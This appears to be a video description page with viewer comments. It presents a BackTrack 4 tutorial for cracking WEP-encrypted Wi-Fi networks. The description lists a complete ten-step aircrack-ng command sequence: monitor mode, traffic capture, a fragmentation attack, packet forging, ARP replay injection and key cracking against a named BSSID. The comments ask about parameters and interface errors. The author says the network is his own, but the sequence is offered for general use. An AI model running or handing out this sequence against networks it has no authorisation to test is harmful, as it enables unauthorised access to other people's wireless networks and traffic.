WEP Cracking with Back Track 4

In this Video, I show you how to crack Wireless networks with WEP encryption. Although these instructions here are a bit vague, you can find much better directions on my website at www.joshhouston.com/wordpress/

Following are the commands that I had to use with my network that I hacked. Take Note, that this is my personal network, so I obviously had permission. The addresses and names will have to be changed for you. I go into more detail on this on my website.
1.airmon-ng start wlan0
2.airodump-ng mon0
3.airodump-ng --bssid 00:23:69:18:E4:7D --channel 6 --ivs -w FUSiON mon0
4.aireplay-ng
5.aireplay-ng -5 -b 00:23:69:18:E4:7D mon0
6.aireplay-ng -1 1 -a 00:23:69:18:E4:7D mon0
7.packetforge-ng -0 -a 00:23:69:18:E4:7D -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0324-230256.xor -w arpy
8.aireplay-ng
9.aireplay-ng -3 -r arpy -b 00:23:69:18:E4:7D mon0
10.aircrack-ng FUSiON

Yo is the 255.255.255.255 the subnet mask of something? will i need to change that at all or just keep it the same?

i don't get it, why didn't you just use Spoonwep after obtaining the BSSID? So much typing for no reason....

It's always better to know how to run through the commands manually, than to have a tool do it completely automatic for you. Once you have a full understanding of how it work and the tools involved, by all means, use a automated tool. I prefer doing it this way though, you have more control, and you know whats going on.

@Elfkes when i type airmong-ng it should say interface chipset driver in the first line as a tittle and the second line it should tell me the actual interface and more... like in this video, right? But i dont get any secound line, in other words, it doesnt tellme the name of my interface to continue with this tutorial. I tough this is what is happening to you too.

@LuisRodriguezVillanu So when you type in start x , it gives a blackscreen and then back to the shell and gives an error that sas : No driver found or something like that ?

@Elfkes i hav the same problem,it shows no interface, chipset, driver... i was wondering if you found a way to make it work so that it would show the interface
